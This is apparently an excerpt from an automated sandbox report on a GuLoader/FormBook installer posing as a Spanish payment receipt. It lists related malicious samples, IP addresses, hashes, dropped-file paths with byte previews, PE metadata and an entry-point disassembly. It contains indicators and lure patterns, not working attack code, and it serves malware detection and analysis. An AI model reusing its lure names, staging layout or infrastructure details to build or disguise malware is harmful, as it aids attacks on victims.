                                                                  • 84.32.84.32
                                                                  3gueXq7uYl.elfGet hashmaliciousMiraiBrowse
                                                                  • 84.32.221.200
                                                                  https://snorkellitfs.com/Get hashmaliciousUnknownBrowse
                                                                  • 84.32.84.32
                                                                  PO-31789R3WY-10_docx.exeGet hashmaliciousFormBookBrowse
                                                                  • 84.32.84.32
                                                                  http://shortens.meGet hashmaliciousUnknownBrowse
                                                                  • 84.32.84.173
                                                                  xjyn487lg15.dllGet hashmaliciousBumbleBeeBrowse
                                                                  • 84.32.84.32
                                                                  PO663636.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • 84.32.84.32
                                                                  9nncBfTB8Kjm7ge.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • 84.32.84.32
                                                                  HIITL-AS-APHongKongFireLineNetworkLTDHKrcuentaparapago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 103.146.179.172
                                                                  cuenta para pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 103.146.179.172
                                                                  Transferencia de pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 103.146.179.172
                                                                  cuenta para pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 103.146.179.172
                                                                  factura pendiente.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 103.146.179.172
                                                                  factura-022899.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 103.146.179.172
                                                                  factura-022853.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 103.146.179.172
                                                                  factura-022853.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 103.146.179.172
                                                                  factura pendiente.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 103.146.179.172
                                                                  Recibo de transferenc#U00eda.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 103.146.179.172

                                                                  JA3 Fingerprints

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  37f463bf4616ecd445d4a1937da06e19comprobante de transferencia.exeGet hashmaliciousGuLoaderBrowse
                                                                  • 142.250.65.174
                                                                  • 142.251.41.1
                                                                  Grundforbedre39.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 142.250.65.174
                                                                  • 142.251.41.1
                                                                  Quote.exeGet hashmaliciousFormBookBrowse
                                                                  • 142.250.65.174
                                                                  • 142.251.41.1
                                                                  PI.1.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 142.250.65.174
                                                                  • 142.251.41.1
                                                                  QUOTE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 142.250.65.174
                                                                  • 142.251.41.1
                                                                  file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                  • 142.250.65.174
                                                                  • 142.251.41.1
                                                                  SSDAIG33Zh.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                  • 142.250.65.174
                                                                  • 142.251.41.1
                                                                  Vindegade.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 142.250.65.174
                                                                  • 142.251.41.1
                                                                  reundertake.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 142.250.65.174
                                                                  • 142.251.41.1
                                                                  Request for quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 142.250.65.174
                                                                  • 142.251.41.1

                                                                  Dropped Files

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dllcomprobante de transferencia.exeGet hashmaliciousGuLoaderBrowse
                                                                    Grundforbedre39.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      comprobante de transferencia.exeGet hashmaliciousGuLoaderBrowse
                                                                        Grundforbedre39.exeGet hashmaliciousGuLoaderBrowse
                                                                          venerationens.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            venerationens.exeGet hashmaliciousGuLoaderBrowse
                                                                              Interviewed.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                Interviewed.exeGet hashmaliciousGuLoaderBrowse
                                                                                  Arborean.exeGet hashmaliciousFormBook, GuLoaderBrowse

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Temp\-49-u729

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\rasautou.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3041002, page size 2048, file counter 3, database pages 92, cookie 0x3a, schema 4, UTF-8, version-valid-for 3
                                                                                    Category:dropped
                                                                                    Size (bytes):188416
                                                                                    Entropy (8bit):0.9926780404836638
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:mavrNdl9bH9KTj8bGA/D3n0mCTV3U25G4qWlrrFB3nKIq9ucs:mavrbl9D9TDn0mCTV3PG43lrfKIq9ps
                                                                                    MD5:BE092D0FC1A86091764AABD40B25CB9E
                                                                                    SHA1:1372556BBC211898F393CC02C4285705AACAE3D7
                                                                                    SHA-256:3A83C0434C667BB30FD9D85D908E652A2569239BBD61079849F299409A48D545
                                                                                    SHA-512:EA6D16D484395A05D836A066248D355DA4C3C7A7B11CA612A87535395C6FDDDF1171624B6B45E41C12C284B5213CE9D22450E212ED0D195280653A4DF19F7892
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:SQLite format 3......@ .......\...........:......................................................f............\........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):11776
                                                                                    Entropy (8bit):5.656126712214018
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:em24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlESl:m8QIl975eXqlWBrz7YLOlE
                                                                                    MD5:A4DD044BCD94E9B3370CCF095B31F896
                                                                                    SHA1:17C78201323AB2095BC53184AA8267C9187D5173
                                                                                    SHA-256:2E226715419A5882E2E14278940EE8EF0AA648A3EF7AF5B3DC252674111962BC
                                                                                    SHA-512:87335A43B9CA13E1300C7C23E702E87C669E2BCF4F6065F0C684FC53165E9C1F091CC4D79A3ECA3910F0518D3B647120AC0BE1A68EAADE2E75EAA64ADFC92C5A
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: comprobante de transferencia.exe, Detection: malicious, Browse
                                                                                    • Filename: Grundforbedre39.exe, Detection: malicious, Browse
                                                                                    • Filename: comprobante de transferencia.exe, Detection: malicious, Browse
                                                                                    • Filename: Grundforbedre39.exe, Detection: malicious, Browse
                                                                                    • Filename: venerationens.exe, Detection: malicious, Browse
                                                                                    • Filename: venerationens.exe, Detection: malicious, Browse
                                                                                    • Filename: Interviewed.exe, Detection: malicious, Browse
                                                                                    • Filename: Interviewed.exe, Detection: malicious, Browse
                                                                                    • Filename: Arborean.exe, Detection: malicious, Browse
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...zc.W...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Afsvkningers148\Grundstddene\Hypertragically\Gaudiest.pre

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):274661
                                                                                    Entropy (8bit):3.2513826448357057
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:VLYngh97JDNV3fLhV/OKJCY2kKIwk7Xf7NTVaYYvPclKkL:5Y6Dnj7JCkK/ovBT89cII
                                                                                    MD5:9CB88B1AE7827818B29E20B15C82A937
                                                                                    SHA1:A60DFA07CBF65C96A3C7019D99452F138A12746E
                                                                                    SHA-256:445AA65354C5F1118FE748FE21ACFA11A69400398DD1CEAE2362242B187CF754
                                                                                    SHA-512:2D0B4879369B2ADF0136AA2CDB1299614311A16D76F2A4FB90521E5D2EA17153874DA1F40C25A0CEBEDBE18DD31C2102AA0B6FAF295F1838FB3798CACA3EF1BE
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:_..................................................J...T......4..N.......1................D...?...a.....j..................2................0.\.J...M...y....Ib..E...he...F..!...............$.M...........D.t...N....m...................j.......................g.z.....}.q.....,.........:....5................J.....]......=..............S......'.....M.:.........P....s...V..w...............|.......5.....D..............=."......8...l..............7..................'....j.....c..................."Z..E.f.......a.....S....|......w=...'t.[vP".........J...Y.........../.......K..........IlB......5........(...........E.b.....@.....................B...................qI.... ......}..>......k.;.Q........U..@e..............J,..qB...`h............:.......x.......3........................L..........2.B...............................P.....z...............=...e....&.....Z..............%.....~h......................................*........l.....G.................]...............H............Y........

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Laver46\Fjeldklftens38.bio

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):200432
                                                                                    Entropy (8bit):3.234993383739913
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:MbK3xS/itsupP4zlLPatE1650lNzpANsqud:x2K16zJa2Qwd
                                                                                    MD5:910B94BB45EC253A90F4CA8FA56BC584
                                                                                    SHA1:ED29E140FE94207B697953B8D1466F7C02F4E60E
                                                                                    SHA-256:BE72DFD9F250BBD69DCFD4508D08A327CBB9B3FBB11964FD5F66BEE35A9FD5C9
                                                                                    SHA-512:93C902D3EC6959BBFA801D13A787A157A998B3615E69EFA205D0952FA6A9935AB699E62316A20F5DB0682DA340FAC8B8454272DDFE9C82D7C16CF57FBB6EE1A0
                                                                                    Malicious:false
                                                                                    Preview:j....................W.................w......Y............'.......e.......h.E.R.........................................w.O..............B.......e.............!...M..r..................i....o.......D.........".....$.....k....)........................V..................o..n.....w...............j.nO..........B..........a......K.......=....a............hA......0......w...........X......x.........$..u..G..........t.....X........|.....H.............................................x.....4...K....7...............j................!...3......F......l......T............U.......v.............~..ay..............G.T...v.q.Tl.'..T...cZ.........1.........,.......H...........P.............n.5...................y...V..[.................~..c..............O.v...V............a.......z=.....r.................{.....P.............+..........$............./.....#................/.....@.....5Q..2...../................H.......3............u|.........$.........................w.i......................c.......

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Laver46\Paunchful.Tau

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):140830
                                                                                    Entropy (8bit):4.592740302073615
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:D5m2W/j6XGNGBEwd8hHB/cTSkC3qH5id1jGk:E2h2iOkT8aEjh
                                                                                    MD5:0AA47FD86AD62B9DED911F927E5AA454
                                                                                    SHA1:D3F9EE25803FFB0736EB9BCA9AB96DEB211F2F29
                                                                                    SHA-256:DE0776B8B0B30E7CC76DB135BA55343E6E98CECC53B95BAFCD1A463B0BA8E00B
                                                                                    SHA-512:A91C7D984BC2B446C945CD445BE724D35B98C6F5DE7E5D3CBA43ED16D4B43ABDCF44FEFBD5F2B21BEF3E68875F79911CA364966FEC199208FB845D7D046C6B12
                                                                                    Malicious:false
                                                                                    Preview:............................d...........wwwww............................wwww..yy.............P...............222.........X...]].......................g...,,,.$$..........==........7................;.E......a.................................*......ee.................r...BB..................................,.dd......p.D.............pp..z......D.;;.;;;..........+..... ........44.[[.II...........a.........#####.............&&&...22.I.......bbbb......'.......................AA.....................h.....................................====..................l..R.).2.uu.............++.........b...CC.........2....................hhh...................""........kkk...................eeeee........vv.........................b....TT.....bb................|||..............____......--.DD.e...5..88........+..................................................pp.................PP.......ww....A.....................h.###......X..........I............+++..................g......J......%%%%..'.....p..

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Roadhouses.Sem74

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):232566
                                                                                    Entropy (8bit):7.8350723226470045
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:VkVJJXyerr8g6/1t/1++V7gLDaKXmv2FrNJCfYV/77PvgIdx1il9BHDyl/+n:CVCmre9dHFKXmeVvCYVXAKk3Bjyq
                                                                                    MD5:94F9D794B89C4C3A5CDBFA0E544C3ED2
                                                                                    SHA1:97AF9B3577CA9BEAC5C3D67668F1CD9D7CC21DA0
                                                                                    SHA-256:E339E88007B243D5C0F7A655B959AE78B38F899A97AAE53D6807255B948E0879
                                                                                    SHA-512:8515782F6C84B8748AFA2C31E9B61BC829917BE50A41370296C46505A6B9B2531CEF87515DF741179249C1EC96E7A8BD765CB53D2582BBE43F730F0259F2D9F8
                                                                                    Malicious:false
                                                                                    Preview:......2..............zzz.....LLL..................................)).~~~..TTT.U.......................r.R...F'B.;...........................................................................y...'........................................................................................................................dg......R...~................................................................................Wo.......N'.......................................................................................v.. HZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ..f.u.f.d..u;\[*...................................................................................................................7.........f...C..................................................................................................f....r.....f..8+--------------------------------------------------------------------------------------------------....f.f....n.$.+..

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Spidsgattedes\Pushwainling\Bimbashi\Undervisningsform.bek

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):272352
                                                                                    Entropy (8bit):3.2380792387673005
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:9wrIYjPjPwOv1ccOX2vCXCdj4w8JJ3WkPd+Eix/j8lQ1KpB:9lYjTwOdccNCup8JJLP8EiF8lB
                                                                                    MD5:93A04CCDF51474B877C9414AE5AD2760
                                                                                    SHA1:1321C10A4CC69A33235C87ABF2779A57619533BB
                                                                                    SHA-256:D9DCAF7157CB66EFE264672D39EA0D004DD2CECDAC777BDB857509AEDDF040FF
                                                                                    SHA-512:675C752DEDAD08A6BBBB976A3E26F03D54B1AF4DDA84999B7749D8DB67BA01E1488CC92AFB5C769A5B4BE3DD67B6AC0038D9062CD8DDEB025E9493241038DB2D
                                                                                    Malicious:false
                                                                                    Preview:..........................................................................&....\..................+.\.......8.@.......+...?d.."...B.............................;....................:..6.....f......h...................n...L.....................m..........$...................4...........Yf.......................+.......P......'..u...........4.......S....K*......!.........1h.....'........................F........AJQ.........P.......k.........8.......Z...B......Z#c........h.....................U.......a....j.......e..!~..C....n!..8.......B........................-...f......y.q.....,....Y........i.........1..~.....c................cQ..............g.z..........................................X........}..........................V.........8...............p....Q..f. .............................^.....).............................o..........^............?......8........................4......................X...........................7S.....O..................p......>......................

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Spidsgattedes\Pushwainling\Bimbashi\floddeltaets.mar

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):207086
                                                                                    Entropy (8bit):3.2412864519720883
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:/xOtUWnnPV6AtPH2oDGzK6jQoplsYXzYl:/xvE6Afw5jQoplLYl
                                                                                    MD5:1171715CBB2206BFF607138FEF73877F
                                                                                    SHA1:D7059E4A741A345239A17FE037C8605D4219E28C
                                                                                    SHA-256:27A8BF54AD65E1DC2C3C88BE4A56792C4960365F12BFF185676D0D4966AE3B31
                                                                                    SHA-512:69449053EAD94E7B0894729E3608F767D8E53775300F876EEC04712C653580EFCEE192BB64EE4A5D10A3B4648351DD0DCB4661F8EB62199BC92B661967ABDB4E
                                                                                    Malicious:false
                                                                                    Preview:...F...$>..........$.K...\.........................'M.......G.......h...4....4..............85......o.}..........e....................<.............H..........l.....DY...c...........N...6...]...n..............................2..q..I....W....................8........-.......2...K..............J..%<.....O..]...m.......H.......z..........................9s........!......s..8.................u..............y.gS................v...`...........a........Q...... .....................j............G...........~.................... ................b.........q...v............p..............S..........{.............c.......#!..........;...................=6.R...1.....6.....t.9...........9....4................9..p.....Y...0..........|...........U..........,......W...~.......d.&.......k{.B.......r......3...w.:..[.^$_...........s.........)....,l..P..........9......{........b......................y...u..C............/..............d..:..............................6.>.#.......>.I2.y.............

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Spidsgattedes\Pushwainling\Bimbashi\gagers.rec

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):183776
                                                                                    Entropy (8bit):3.2465393215116713
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:0Y0pp0QgB1Uepc+D+FJOHDz9WWhEGwk/oZP:0Y0piQgB1Uepc+6Q5h7T/+
                                                                                    MD5:B013C10185F365E645B1A8A4090DE5AF
                                                                                    SHA1:20F0178AD225AEC8785EA741E82729E6D816CEF0
                                                                                    SHA-256:0A403F11C29743BFFF4A5CBB13DA533121BC9CEC2F2BD38473F3939895422E4C
                                                                                    SHA-512:B33FDB0357DA26C5E4A6BB45B50FDEAFE102E428F56D90A5EAC57829F5F57F8323C689A2BE928A468DB46948012078D10B605AE03F246EAA72827B1351807412
                                                                                    Malicious:false
                                                                                    Preview:...Y..[..-.........<..\.....IB......................}-.....................?.....a.......}..........,..........1...>..........9||...........&.....!.....T.................h....;....G............./N................G....................!..E...........:...0............=.......................,........l...'..............e...........Z..I..H...M..>...p..........j....S.].....................r..........v..........................l.......ad......q!.....b.4...(...............3............h..................^...........^...................b........................~.......^n.........e...................&.....................................H......6.................j....S..e........g..........H........5...........)...............,....8_..................7................Z.........o.n.......W....4...t.....|..........2.....o...............................y..%..n........hh....0....X...{...W..$...9..l..........*.............Ji..........I.........|...........F.....|......G.4....M.0Y.8...............

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Spidsgattedes\Pushwainling\Bimbashi\kannevasen.txt

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):453
                                                                                    Entropy (8bit):4.317248216463251
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:pUVo0WmtKoENHeo6fAy/22Xe7V9Ec/BZMIjbAl4WOE:KjKb9Vyul59JXehn
                                                                                    MD5:9F716DE9908957BD324DCC4ADA5A33F7
                                                                                    SHA1:5AA93CFD2DF40B9ED1F46A728EEE203258DC05DD
                                                                                    SHA-256:CDBC11AE1032690D95484A15A78C94AECFEE10103E26372894547D7B25C01A94
                                                                                    SHA-512:0C47E325FD292F1E782B69F985A92336D1F0DF39E8C0902389F81BB6E7CE212968EF6EA9ABCBE2C8B9869021A9095B868E93AF51EBF8085596FCC5B05E35F237
                                                                                    Malicious:false
                                                                                    Preview:reaudition bancal scalelike boligaktivister uninstructedness..tankers befragternes unfoggy snowmaker ectrodactylia leachier..gopherman ultrarapidt ichthyosis repine leniencies mistreading..supergravitated indlemning rhinoceroses hjaelpelaerere dizzies spndkraft kopskifte reenlargement backtack tylosoid..brevpakkernes foderautomaten supersarcasm lystrede whiteheart teratogenous.fetology uneddied archprimate pilotprojekters slovakish pseudoassertive..

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Entropy (8bit):7.98667284386465
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:cuenta para pago1.exe
                                                                                    File size:826'296 bytes
                                                                                    MD5:93d1942c204022e792af256d0ccbe8e5
                                                                                    SHA1:76649fb41dc760d4c9ad8be23e239fcb7b0e2418
                                                                                    SHA256:c44904bfb8b44d8071f33359f824028597145f76bd1a6baf86d91679215e3c7d
                                                                                    SHA512:84847cec402e63e88681b9d9ea4473790cefa39c0ab500b895ca0ea4ca89d4c756a3c99fc03cd8737a06b9393a6f592994674f25e1402700eab85919197047e1
                                                                                    SSDEEP:12288:7qL1BIckrqvvW+ziaB/5FsfecWGClPW3ObwMB8aqEEbViGCyQRy1/6dzgA6zZxfV:A8ckmHN5Fo+GClPgBoZyQqNbbfNP
                                                                                    TLSH:3405230253534061F8E2C8B149B5E3A2D438BAD8D329D60E6B7425B9765FF62CE2533F
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....c.W.................`...*......j2.......p....@

                                                                                    File Icon

                                                                                    Icon Hash:3d2e0f95332b3399

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x40326a
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:true
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x57956391 [Mon Jul 25 00:55:45 2016 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:e2a592076b17ef8bfb48b7e03965a3fc

                                                                                    Authenticode Signature

                                                                                    Signature Valid:false
                                                                                    Signature Issuer:E=Pereirine@Pentametrist.an, O=Solacers, OU="Svenskekysts Avicolous ", CN=Solacers, L=Bierville, S=Normandie, C=FR
                                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                    Error Number:-2146762487
                                                                                    Not Before, Not After
                                                                                    • 08/06/2023 01:41:04 07/06/2026 01:41:04
                                                                                    Subject Chain
                                                                                    • E=Pereirine@Pentametrist.an, O=Solacers, OU="Svenskekysts Avicolous ", CN=Solacers, L=Bierville, S=Normandie, C=FR
                                                                                    Version:3
                                                                                    Thumbprint MD5:2EC7E8275C20559E88C538C96D7D0E67
                                                                                    Thumbprint SHA-1:281A679C7E193E694322E17A51E1FC2D31F1AC63
                                                                                    Thumbprint SHA-256:85FB8EFD8690E8B768C88F9ACF3CBF799ABB9D9F3DCDAA65E4BF9CBD935AB2DA
                                                                                    Serial:60380FD1D1389917E43B142D7968F4113B427534

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    sub esp, 000002D4h
                                                                                    push ebx
                                                                                    push esi
                                                                                    push edi
                                                                                    push 00000020h
                                                                                    pop edi
                                                                                    xor ebx, ebx
                                                                                    push 00008001h
                                                                                    mov dword ptr [esp+14h], ebx
                                                                                    mov dword ptr [esp+10h], 004092E0h
                                                                                    mov dword ptr [esp+1Ch], ebx
                                                                                    call dword ptr [004070B0h]
                                                                                    call dword ptr [004070ACh]
                                                                                    cmp ax, 00000006h
                                                                                    je 00007F1394BF6AB3h
                                                                                    push ebx
                                                                                    call 00007F1394BF9BF4h
                                                                                    cmp eax, ebx
                                                                                    je 00007F1394BF6AA9h
                                                                                    push 00000C00h
                                                                                    call eax
                                                                                    mov esi, 004072B8h
                                                                                    push esi
                                                                                    call 00007F1394BF9B6Eh
                                                                                    push esi
                                                                                    call dword ptr [0040715Ch]
                                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                                    cmp byte ptr [esi], 00000000h
                                                                                    jne 00007F1394BF6A8Ch
                                                                                    push ebp
                                                                                    push 00000009h
                                                                                    call 00007F1394BF9BC6h
                                                                                    push 00000007h
                                                                                    call 00007F1394BF9BBFh
                                                                                    mov dword ptr [00429204h], eax
                                                                                    call dword ptr [0040703Ch]
                                                                                    push ebx
                                                                                    call dword ptr [004072A4h]
                                                                                    mov dword ptr [004292B8h], eax
                                                                                    push ebx
                                                                                    lea eax, dword ptr [esp+34h]
                                                                                    push 000002B4h
                                                                                    push eax
                                                                                    push ebx
                                                                                    push 004206A8h
                                                                                    call dword ptr [00407188h]
                                                                                    push 004092C8h
                                                                                    push 00428200h
                                                                                    call 00007F1394BF97A8h
                                                                                    call dword ptr [004070A8h]
                                                                                    mov ebp, 00434000h
                                                                                    push eax
                                                                                    push ebp
                                                                                    call 00007F1394BF9796h
                                                                                    push ebx
                                                                                    call dword ptr [00407174h]
                                                                                    add word ptr [eax], 0000h

                                                                                    Rich Headers

                                                                                    Programming Language:
                                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x75040xa0.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x670000xb48.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xc80d80x1ae0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b4.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x5ff90x600034f0469eb860d5ecf0e52ef9d3820a60False0.6667073567708334data6.4734859396670705IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x70000x13a40x1400848ecd58951d0a4cfe8ec8cfce6b20d1False0.452734375data5.125569346027248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0x90000x202f80x6003953dbb7217e7539ee75e90871f7aef9False0.4947916666666667data3.9050018847265378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .ndata0x2a0000x3d0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rsrc0x670000xb480xc00737bf22e330f1bb677a1a75bfb3076c2False0.4215494791666667data4.359435247089545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_ICON0x671c00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.42473118279569894
                                                                                    RT_DIALOG0x674a80x100dataEnglishUnited States0.5234375
                                                                                    RT_DIALOG0x675a80x11cdataEnglishUnited States0.6056338028169014
                                                                                    RT_DIALOG0x676c80xc4dataEnglishUnited States0.5918367346938775
                                                                                    RT_DIALOG0x677900x60dataEnglishUnited States0.7291666666666666
                                                                                    RT_GROUP_ICON0x677f00x14dataEnglishUnited States1.2
                                                                                    RT_MANIFEST0x678080x33dXML 1.0 document, ASCII text, with very long lines (829), with no line terminatorsEnglishUnited States0.5536791314837153

                                                                                    Imports

                                                                                    DLLImport
